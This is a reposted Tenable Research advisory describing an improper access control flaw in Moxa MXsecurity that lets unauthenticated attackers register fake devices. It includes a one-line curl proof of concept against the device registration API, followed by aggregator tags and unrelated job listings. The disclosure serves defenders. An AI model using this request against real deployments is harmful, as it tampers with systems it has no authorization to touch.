Sept. 5, 2023, 1:14 p.m. | Jimi Sebree

Tenable Research Advisories www.tenable.com

Moxa MXsecurity Unauthenticated Device Registration

A security issue regarding improper access controls has been discovered in Moxa MXsecurity V1.0.1-23021705. It allows an unauthenticated remote attacker to register/add devices via the nsm-web application. This pollutes the MXsecurity sqlite database and the nsm-web UI.

Proof of Concept




curl -k -H 'Content-Type:application/json' -d '{"mac":"11:11:11:11:11:11", "serialNumber":"1234", "modelName":"aaa", "hostname":"device_1", "firmwareVersion":"1.1", "location":"location_1"}' 'https:///api/v1/devices/register'


Jimi Sebree
Tue, 09/05/2023 - 09:14

access access controls application attacker concept controls database device devices issue moxa nsm proof register registration security sqlite sqlite database unauthenticated web web application

Social Engineer For Reverse Engineering Exploit Study

@ Independent study | Remote

Information Security Engineer, Sr. (Container Hardening)

@ Rackner | San Antonio, TX

BaaN IV Techno-functional consultant-On-Balfour

@ Marlabs | Piscataway, US

Senior Security Analyst

@ BETSOL | Bengaluru, India

Security Operations Centre Operator

@ NEXTDC | West Footscray, Australia

Senior Network and Security Research Officer

@ University of Toronto | Toronto, ON, CA